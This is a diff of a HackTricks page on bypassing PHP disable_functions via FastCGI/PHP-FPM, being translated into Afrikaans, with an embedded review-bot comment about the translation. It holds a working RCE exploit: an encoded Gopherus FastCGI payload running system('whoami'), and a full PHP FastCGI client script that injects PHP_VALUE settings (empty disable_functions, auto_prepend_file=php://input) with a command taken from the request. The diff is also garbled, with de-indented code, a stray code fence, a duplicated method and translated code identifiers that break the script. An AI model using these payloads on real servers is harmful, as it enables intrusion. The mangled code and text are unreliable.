Asseblief, as jy meer inligting hieroor het, kontak my via \[**PEASS & HackTricks telegram-groep hier**]\([**https://t.me/peass**](https://t.me/peass)), of twitter \[**@carlospolopm**]\([**https://twitter.com/hacktricks_live**](https://twitter.com/hacktricks_live))**.** {% endhint %} -Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands: +Met behulp van [Gopherus](https://github.com/tarunkant/Gopherus) kan jy 'n nutslading genereer om na die FastCGI-luisteraar te stuur en arbitrêre opdragte uit te voer: ![](<../../../../.gitbook/assets/image (351).png>) - -Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**]\([http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=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)). 
And then copy/pasting the abse64 in this php code: - +Dan kan jy die urlencoded payload gryp en dit dekodeer en omskakel na base64, \[**deur hierdie resep van cyberchef byvoorbeeld te gebruik**]\([http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=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)). 
En dan kopieer/plak die base64 in hierdie php-kode: ```php - * @version 1.0 - */ +* Handles communication with a FastCGI application +* +* @author Pierrick Charron +* @version 1.0 +*/ class FCGIClient { - const VERSION_1 = 1; - const BEGIN_REQUEST = 1; - const ABORT_REQUEST = 2; - const END_REQUEST = 3; - const PARAMS = 4; - const STDIN = 5; - const STDOUT = 6; - const STDERR = 7; - const DATA = 8; - const GET_VALUES = 9; - const GET_VALUES_RESULT = 10; - const UNKNOWN_TYPE = 11; - const MAXTYPE = self::UNKNOWN_TYPE; - const RESPONDER = 1; - const AUTHORIZER = 2; - const FILTER = 3; - const REQUEST_COMPLETE = 0; - const CANT_MPX_CONN = 1; - const OVERLOADED = 2; - const UNKNOWN_ROLE = 3; - const MAX_CONNS = 'MAX_CONNS'; - const MAX_REQS = 'MAX_REQS'; - const MPXS_CONNS = 'MPXS_CONNS'; - const HEADER_LEN = 8; - /** - * Socket - * @var Resource - */ - private $_sock = null; - /** - * Host - * @var String - */ - private $_host = null; - /** - * Port - * @var Integer - */ - private $_port = null; - /** - * Keep Alive - * @var Boolean - */ - private $_keepAlive = false; - /** - * Constructor - * - * @param String $host Host of the FastCGI application - * @param Integer $port Port of the FastCGI application - */ - public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket - { - $this->_host = $host; - $this->_port = $port; - } - /** - * Define whether or not the FastCGI application should keep the connection - * alive at the end of a request - * - * @param Boolean $b true if the connection should stay alive, false otherwise - */ - public function setKeepAlive($b) - { - $this->_keepAlive = (boolean)$b; - if (!$this->_keepAlive && $this->_sock) { - fclose($this->_sock); - } - } - /** - * Get the keep alive status - * - * @return Boolean true if the connection should stay alive, false otherwise - */ - public function getKeepAlive() - { - return $this->_keepAlive; - } - /** - * Create a connection to the FastCGI application - 
*/ - private function connect() - { - if (!$this->_sock) { - //$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5); - $this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5); - if (!$this->_sock) { - throw new Exception('Unable to connect to FastCGI application'); - } - } - } - /** - * Build a FastCGI packet - * - * @param Integer $type Type of the packet - * @param String $content Content of the packet - * @param Integer $requestId RequestId - */ - private function buildPacket($type, $content, $requestId = 1) - { - $clen = strlen($content); - return chr(self::VERSION_1) /* version */ - . chr($type) /* type */ - . chr(($requestId >> 8) & 0xFF) /* requestIdB1 */ - . chr($requestId & 0xFF) /* requestIdB0 */ - . chr(($clen >> 8 ) & 0xFF) /* contentLengthB1 */ - . chr($clen & 0xFF) /* contentLengthB0 */ - . chr(0) /* paddingLength */ - . chr(0) /* reserved */ - . $content; /* content */ - } - /** - * Build an FastCGI Name value pair - * - * @param String $name Name - * @param String $value Value - * @return String FastCGI Name value pair - */ - private function buildNvpair($name, $value) - { - $nlen = strlen($name); - $vlen = strlen($value); - if ($nlen < 128) { - /* nameLengthB0 */ - $nvpair = chr($nlen); - } else { - /* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */ - $nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF); - } - if ($vlen < 128) { - /* valueLengthB0 */ - $nvpair .= chr($vlen); - } else { - /* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */ - $nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF); - } - /* nameData & valueData */ - return $nvpair . $name . 
$value; - } - /** - * Read a set of FastCGI Name value pairs - * - * @param String $data Data containing the set of FastCGI NVPair - * @return array of NVPair - */ - private function readNvpair($data, $length = null) - { - $array = array(); - if ($length === null) { - $length = strlen($data); - } - $p = 0; - while ($p != $length) { - $nlen = ord($data{$p++}); - if ($nlen >= 128) { - $nlen = ($nlen & 0x7F << 24); - $nlen |= (ord($data{$p++}) << 16); - $nlen |= (ord($data{$p++}) << 8); - $nlen |= (ord($data{$p++})); - } - $vlen = ord($data{$p++}); - if ($vlen >= 128) { - $vlen = ($nlen & 0x7F << 24); - $vlen |= (ord($data{$p++}) << 16); - $vlen |= (ord($data{$p++}) << 8); - $vlen |= (ord($data{$p++})); - } - $array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen); - $p += ($nlen + $vlen); - } - return $array; - } - /** - * Decode a FastCGI Packet - * - * @param String $data String containing all the packet - * @return array - */ - private function decodePacketHeader($data) - { - $ret = array(); - $ret['version'] = ord($data{0}); - $ret['type'] = ord($data{1}); - $ret['requestId'] = (ord($data{2}) << 8) + ord($data{3}); - $ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5}); - $ret['paddingLength'] = ord($data{6}); - $ret['reserved'] = ord($data{7}); - return $ret; - } - /** - * Read a FastCGI Packet - * - * @return array - */ - private function readPacket() - { - if ($packet = fread($this->_sock, self::HEADER_LEN)) { - $resp = $this->decodePacketHeader($packet); - $resp['content'] = ''; - if ($resp['contentLength']) { - $len = $resp['contentLength']; - while ($len && $buf=fread($this->_sock, $len)) { - $len -= strlen($buf); - $resp['content'] .= $buf; - } - } - if ($resp['paddingLength']) { - $buf=fread($this->_sock, $resp['paddingLength']); - } - return $resp; - } else { - return false; - } - } - /** - * Get Informations on the FastCGI application - * - * @param array $requestedInfo information to retrieve - * @return array - */ - public function 
getValues(array $requestedInfo) - { - $this->connect(); - $request = ''; - foreach ($requestedInfo as $info) { - $request .= $this->buildNvpair($info, ''); - } - fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0)); - $resp = $this->readPacket(); - if ($resp['type'] == self::GET_VALUES_RESULT) { - return $this->readNvpair($resp['content'], $resp['length']); - } else { - throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT'); - } - } - /** - * Execute a request to the FastCGI application - * - * @param array $params Array of parameters - * @param String $stdin Content - * @return String - */ - public function request(array $params, $stdin) - { - $response = ''; - $this->connect(); - $request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5)); - $paramsRequest = ''; - foreach ($params as $key => $value) { - $paramsRequest .= $this->buildNvpair($key, $value); - } - if ($paramsRequest) { - $request .= $this->buildPacket(self::PARAMS, $paramsRequest); - } - $request .= $this->buildPacket(self::PARAMS, ''); - if ($stdin) { - $request .= $this->buildPacket(self::STDIN, $stdin); - } - $request .= $this->buildPacket(self::STDIN, ''); - fwrite($this->_sock, $request); - do { - $resp = $this->readPacket(); - if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) { - $response .= $resp['content']; - } - } while ($resp && $resp['type'] != self::END_REQUEST); - var_dump($resp); - if (!is_array($resp)) { - throw new Exception('Bad request'); - } - switch (ord($resp['content']{4})) { - case self::CANT_MPX_CONN: - throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]'); - break; - case self::OVERLOADED: - throw new Exception('New request rejected; too busy [OVERLOADED]'); - break; - case self::UNKNOWN_ROLE: - throw new Exception('Role value not known [UNKNOWN_ROLE]'); - break; - case self::REQUEST_COMPLETE: - return $response; - } - } +const 
VERSION_1 = 1; +const BEGIN_REQUEST = 1; +const ABORT_REQUEST = 2; +const END_REQUEST = 3; +const PARAMS = 4; +const STDIN = 5; +const STDOUT = 6; +const STDERR = 7; +const DATA = 8; +const GET_VALUES = 9; +const GET_VALUES_RESULT = 10; +const UNKNOWN_TYPE = 11; +const MAXTYPE = self::UNKNOWN_TYPE; +const RESPONDER = 1; +const AUTHORIZER = 2; +const FILTER = 3; +const REQUEST_COMPLETE = 0; +const CANT_MPX_CONN = 1; +const OVERLOADED = 2; +const UNKNOWN_ROLE = 3; +const MAX_CONNS = 'MAX_CONNS'; +const MAX_REQS = 'MAX_REQS'; +const MPXS_CONNS = 'MPXS_CONNS'; +const HEADER_LEN = 8; +/** +* Socket +* @var Resource +*/ +private $_sock = null; +/** +* Host +* @var String +*/ +private $_host = null; +/** +* Port +* @var Integer +*/ +private $_port = null; +/** +* Keep Alive +* @var Boolean +*/ +private $_keepAlive = false; +/** +* Constructor +* +* @param String $host Host of the FastCGI application +* @param Integer $port Port of the FastCGI application +*/ +public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket +{ +$this->_host = $host; +$this->_port = $port; +} +/** +* Define whether or not the FastCGI application should keep the connection +* alive at the end of a request +* +* @param Boolean $b true if the connection should stay alive, false otherwise +*/ +public function setKeepAlive($b) +{ +$this->_keepAlive = (boolean)$b; +if (!$this->_keepAlive && $this->_sock) { +fclose($this->_sock); +} +} +/** +* Get the keep alive status +* +* @return Boolean true if the connection should stay alive, false otherwise +*/ +public function getKeepAlive() +{ +return $this->_keepAlive; +} +/** +* Create a connection to the FastCGI application +*/ +private function connect() +{ +if (!$this->_sock) { +//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5); +$this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5); +if (!$this->_sock) { +throw new Exception('Unable to connect to FastCGI 
application'); +} +} +} +/** +* Build a FastCGI packet +* +* @param Integer $type Type of the packet +* @param String $content Content of the packet +* @param Integer $requestId RequestId +*/ +private function buildPacket($type, $content, $requestId = 1) +{ +$clen = strlen($content); +return chr(self::VERSION_1) /* version */ +. chr($type) /* type */ +. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */ +. chr($requestId & 0xFF) /* requestIdB0 */ +. chr(($clen >> 8 ) & 0xFF) /* contentLengthB1 */ +. chr($clen & 0xFF) /* contentLengthB0 */ +. chr(0) /* paddingLength */ +. chr(0) /* reserved */ +. $content; /* content */ +} +/** +* Build an FastCGI Name value pair +* +* @param String $name Name +* @param String $value Value +* @return String FastCGI Name value pair +*/ +private function buildNvpair($name, $value) +{ +$nlen = strlen($name); +$vlen = strlen($value); +if ($nlen < 128) { +/* nameLengthB0 */ +$nvpair = chr($nlen); +} else { +/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */ +$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF); +} +if ($vlen < 128) { +/* valueLengthB0 */ +$nvpair .= chr($vlen); +} else { +/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */ +$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF); +} +/* nameData & valueData */ +return $nvpair . $name . 
$value; +} +/** +* Read a set of FastCGI Name value pairs +* +* @param String $data Data containing the set of FastCGI NVPair +* @return array of NVPair +*/ +private function readNvpair($data, $length = null) +{ +$array = array(); +if ($length === null) { +$length = strlen($data); +} +$p = 0; +while ($p != $length) { +$nlen = ord($data{$p++}); +if ($nlen >= 128) { +$nlen = ($nlen & 0x7F << 24); +$nlen |= (ord($data{$p++}) << 16); +$nlen |= (ord($data{$p++}) << 8); +$nlen |= (ord($data{$p++})); +} +$vlen = ord($data{$p++}); +if ($vlen >= 128) { +$vlen = ($nlen & 0x7F << 24); +$vlen |= (ord($data{$p++}) << 16); +$vlen |= (ord($data{$p++}) << 8); +$vlen |= (ord($data{$p++})); +} +$array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen); +$p += ($nlen + $vlen); +} +return $array; +} +/** +* Decode a FastCGI Packet +* +* @param String $data String containing all the packet +* @return array +*/ +private function decodePacketHeader($data) +{ +$ret = array(); +$ret['version'] = ord($data{0}); +$ret['type'] = ord($data{1}); +$ret['requestId'] = (ord($data{2}) << 8) + ord($data{3}); +$ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5}); +$ret['paddingLength'] = ord($data{6}); +$ret['reserved'] = ord($data{7}); +return $ret; +} +/** +* Read a FastCGI Packet +* +* @return array +*/ +private function readPacket() +{ +if ($packet = fread($this->_sock, self::HEADER_LEN)) { +$resp = $this->decodePacketHeader($packet); +$resp['content'] = ''; +if ($resp['contentLength']) { +$len = $resp['contentLength']; +while ($len && $buf=fread($this->_sock, $len)) { +$len -= strlen($buf); +$resp['content'] .= $buf; +} +} +if ($resp['paddingLength']) { +$buf=fread($this->_sock, $resp['paddingLength']); +} +return $resp; +} else { +return false; +} +} +/** +* Get Informations on the FastCGI application +* +* @param array $requestedInfo information to retrieve +* @return array +*/ +public function getValues(array $requestedInfo) +{ +$this->connect(); +$request = ''; +foreach 
($requestedInfo as $info) { +$request .= $this->buildNvpair($info, ''); +} +fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0)); +$resp = $this->readPacket(); +if ($resp['type'] == self::GET_VALUES_RESULT) { +return $this->readNvpair($resp['content'], $resp['length']); +} else { +throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT'); +} +} +/** +* Execute a request to the FastCGI application +* +* @param array $params Array of parameters +* @param String $stdin Content +```php +* @return String +*/ +public function request(array $params, $stdin) +{ +$response = ''; +$this->connect(); +$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5)); +$paramsRequest = ''; +foreach ($params as $key => $value) { +$paramsRequest .= $this->buildNvpair($key, $value); +} +if ($paramsRequest) { +$request .= $this->buildPacket(self::PARAMS, $paramsRequest); +} +$request .= $this->buildPacket(self::PARAMS, ''); +if ($stdin) { +$request .= $this->buildPacket(self::STDIN, $stdin); +} +$request .= $this->buildPacket(self::STDIN, ''); +fwrite($this->_sock, $request); +do { +$resp = $this->readPacket(); +if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) { +$response .= $resp['content']; +} +} while ($resp && $resp['type'] != self::END_REQUEST); +var_dump($resp); +if (!is_array($resp)) { +throw new Exception('Bad request'); +} +switch (ord($resp['content']{4})) { +case self::CANT_MPX_CONN: +throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]'); +break; +case self::OVERLOADED: +throw new Exception('New request rejected; too busy [OVERLOADED]'); +break; +case self::UNKNOWN_ROLE: +throw new Exception('Role value not known [UNKNOWN_ROLE]'); +break; +case self::REQUEST_COMPLETE: +return $response; +} +} } ?> "; // php payload -- $php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input"; 
//$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php"; $params = array( - 'GATEWAY_INTERFACE' => 'FastCGI/1.0', - 'REQUEST_METHOD' => 'POST', - 'SCRIPT_FILENAME' => $filepath, - 'SCRIPT_NAME' => $req, - 'QUERY_STRING' => 'command='.$_REQUEST['cmd'], - 'REQUEST_URI' => $uri, - 'DOCUMENT_URI' => $req, +'GATEWAY_INTERFACE' => 'FastCGI/1.0', +'REQUEST_METHOD' => 'POST', +'SCRIPT_FILENAME' => $filepath, +'SCRIPT_NAME' => $req, +'QUERY_STRING' => 'command='.$_REQUEST['cmd'], +'REQUEST_URI' => $uri, +'DOCUMENT_URI' => $req, #'DOCUMENT_ROOT' => '/', - 'PHP_VALUE' => $php_value, - 'SERVER_SOFTWARE' => '80sec/wofeiwo', - 'REMOTE_ADDR' => '127.0.0.1', - 'REMOTE_PORT' => '9985', - 'SERVER_ADDR' => '127.0.0.1', - 'SERVER_PORT' => '80', - 'SERVER_NAME' => 'localhost', - 'SERVER_PROTOCOL' => 'HTTP/1.1', - 'CONTENT_LENGTH' => strlen($code) - ); +'PHP_VALUE' => $php_value, +'SERVER_SOFTWARE' => '80sec/wofeiwo', +'REMOTE_ADDR' => '127.0.0.1', +'REMOTE_PORT' => '9985', +'SERVER_ADDR' => '127.0.0.1', +'SERVER_PORT' => '80', +'SERVER_NAME' => 'localhost', +'SERVER_PROTOCOL' => 'HTTP/1.1', +'CONTENT_LENGTH' => strlen($code) +); // print_r($_REQUEST); // print_r($params); //echo "Call: $uri\n\n"; 
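Review bot: this hunk rewrites the inside of the fenced PHP block, which a translation should pass through untouched. Every line of the `FCGIClient` class loses its indentation (`- const VERSION_1 = 1;` becomes `+const VERSION_1 = 1;`, `- $this->_host = $host;` becomes `+$this->_host = $host;`, and so on through the whole class), and a stray ```php line is inserted between `+* @param String $stdin Content` and `+* @return String`, which closes the code fence in the middle of a docblock and renders the rest of `request()`, the `$php_value` string and the `$params` array as prose. Restore the original indentation and drop that inserted fence; the translator should skip fenced blocks entirely. Since these lines are being touched anyway, two pre-existing defects carried over unchanged in the same block could be fixed in the same pass: in `readNvpair` the four-byte length branch reads `$vlen = ($nlen & 0x7F << 24);` where `$nlen` should be `$vlen`, and the `$data{$p++}` / `$data{0}` brace string offsets no longer parse on PHP 8, so `$data[$p++]` is the portable form.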
@@ -418,44 +415,132 @@ echo $client->request($params, $code)."\n"; ?> ``` -Using the previous function you will see that the function **`system`** is **still disabled** but **`phpinfo()`** shows a **`disable_functions`** **empty**: +```php +* @return String +*/ +public function versoek(array $params, $stdin) +{ +$response = ''; +$this->verbind(); +$versoek = $this->bouPakket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5)); +$paramsVersoek = ''; +foreach ($params as $sleutel => $waarde) { +$paramsVersoek .= $this->bouNvpaar($sleutel, $waarde); +} +if ($paramsVersoek) { +$versoek .= $this->bouPakket(self::PARAMS, $paramsVersoek); +} +$versoek .= $this->bouPakket(self::PARAMS, ''); +if ($stdin) { +$versoek .= $this->bouPakket(self::STDIN, $stdin); +} +$versoek .= $this->bouPakket(self::STDIN, ''); +fwrite($this->_sock, $versoek); +do { +$resp = $this->leesPakket(); +if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) { +$response .= $resp['content']; +} +} while ($resp && $resp['type'] != self::END_REQUEST); +var_dump($resp); +if (!is_array($resp)) { +throw new Exception('Slegte versoek'); +} +switch (ord($resp['content']{4})) { +case self::CANT_MPX_CONN: +throw new Exception('Hierdie toepassing kan nie multiplex nie [CANT_MPX_CONN]'); +break; +case self::OVERLOADED: +throw new Exception('Nuwe versoek afgekeur; te besig [OVERLOADED]'); +break; +case self::UNKNOWN_ROLE: +throw new Exception('Rolwaarde onbekend [UNKNOWN_ROLE]'); +break; +case self::REQUEST_COMPLETE: +return $response; +} +} +} +?> +"; // php payload -- Doen niks nie +$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input"; +//$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php"; +$params = array( +'GATEWAY_INTERFACE' => 'FastCGI/1.0', +'REQUEST_METHOD' => 'POST', +'SCRIPT_FILENAME' => $filepath, 
+'SCRIPT_NAME' => $req, +'QUERY_STRING' => 'command='.$_REQUEST['cmd'], +'REQUEST_URI' => $uri, +'DOCUMENT_URI' => $req, +#'DOCUMENT_ROOT' => '/', +'PHP_VALUE' => $php_value, +'SERVER_SOFTWARE' => '80sec/wofeiwo', +'REMOTE_ADDR' => '127.0.0.1', +'REMOTE_PORT' => '9985', +'SERVER_ADDR' => '127.0.0.1', +'SERVER_PORT' => '80', +'SERVER_NAME' => 'localhost', +'SERVER_PROTOCOL' => 'HTTP/1.1', +'CONTENT_LENGTH' => strlen($code) +); +// print_r($_REQUEST); +// print_r($params); +//echo "Call: $uri\n\n"; +echo $client->versoek($params, $code)."\n"; +?> +``` +Met behulp van die vorige funksie sal jy sien dat die funksie **`system`** steeds **gedeaktiveer** is, maar **`phpinfo()`** toon 'n **leë `disable_functions`**: ![](<../../../../.gitbook/assets/image (352).png>) ![](<../../../../.gitbook/assets/image (353).png>) -**So, I think that you can only set `disable_functions` via php `.ini` config files and the PHP\_VALUE won't override that setting.** +**So, ek dink jy kan slegs `disable_functions` instel deur middel van php `.ini`-konfigurasie lêers en die PHP\_VALUE sal nie daardie instelling oorskryf nie.** ### [**FuckFastGCI**](https://github.com/w181496/FuckFastcgi) -This is a php script to exploit fastcgi protocol to bypass `open_basedir` and `disable_functions`.\ -It will help you to bypass strict `disable_functions` to RCE by loading the malicious extension.\ -You can access it here: [https://github.com/w181496/FuckFastcgi](https://github.com/w181496/FuckFastcgi) or a sligtly modified and improved version here: [https://github.com/BorelEnzo/FuckFastcgi](https://github.com/BorelEnzo/FuckFastcgi) +Dit is 'n php-skrip om die fastcgi-protokol te misbruik om `open_basedir` en `disable_functions` te omseil.\ +Dit sal jou help om streng `disable_functions` te omseil om RCE te bereik deur die skadelike uitbreiding te laai.\ +Jy kan dit hier besoek: [https://github.com/w181496/FuckFastcgi](https://github.com/w181496/FuckFastcgi) of 'n effens gewysigde en verbeterde weergawe 
hier: [https://github.com/BorelEnzo/FuckFastcgi](https://github.com/BorelEnzo/FuckFastcgi) -You will find that the exploit is very similar to the previous code, but instead of trying to bypass `disable_functions` using PHP\_VALUE, it tries to **load an external PHP module** to execute code using the parameters `extension_dir` and `extension` inside the variable `PHP_ADMIN_VALUE`.\ -**NOTE1**: You probably will need to **recompile** the extension with the **same PHP version that the server** is using (you can check it inside the output of phpinfo): +Jy sal vind dat die uitbuiting baie soortgelyk is aan die vorige kode, maar in plaas daarvan om te probeer om `disable_functions` te omseil deur PHP\_VALUE te gebruik, probeer dit om 'n eksterne PHP-module te **laai** om kode uit te voer deur die parameters `extension_dir` en `extension` binne die veranderlike `PHP_ADMIN_VALUE`.\ +**NOTA1**: Jy sal waarskynlik die uitbreiding met dieselfde PHP-weergawe as die bediener **moet herkompilieer** (jy kan dit binne die uitset van phpinfo nagaan): ![](<../../../../.gitbook/assets/image (354).png>) {% hint style="danger" %} -**NOTE2**: I managed to make this work by inserting the `extension_dir` and `extension` values inside a PHP `.ini` config file (something that you won't be able to do attacking a server). But for some reason, when using this exploit and loading the extension from the `PHP_ADMIN_VALUE` variable the process just died, so I don't know if this technique is still valid. +**NOTA2**: Ek het daarin geslaag om dit te laat werk deur die `extension_dir` en `extension` waardes binne 'n PHP `.ini`-konfigurasie lêer in te voeg (iets wat jy nie sal kan doen om 'n bediener aan te val nie). Maar om een of ander rede, wanneer jy hierdie uitbuiting gebruik en die uitbreiding van die `PHP_ADMIN_VALUE`-veranderlike laai, sterf die proses net, so ek weet nie of hierdie tegniek nog geldig is nie. 
{% endhint %} ### PHP-FPM Remote Code Execution Vulnerability (CVE-2019–11043) -You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test is using this docker environment: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).\ -You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.** +Jy kan hierdie kwesbaarheid uitbuit met [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) en dit toets met hierdie docker-omgewing: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).\ +Jy kan ook 'n ontleding van die kwesbaarheid vind [**hier**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
